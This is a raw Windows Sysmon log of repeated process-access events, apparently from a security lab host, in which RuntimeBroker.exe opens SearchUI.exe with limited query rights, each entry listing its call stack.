13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.648{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
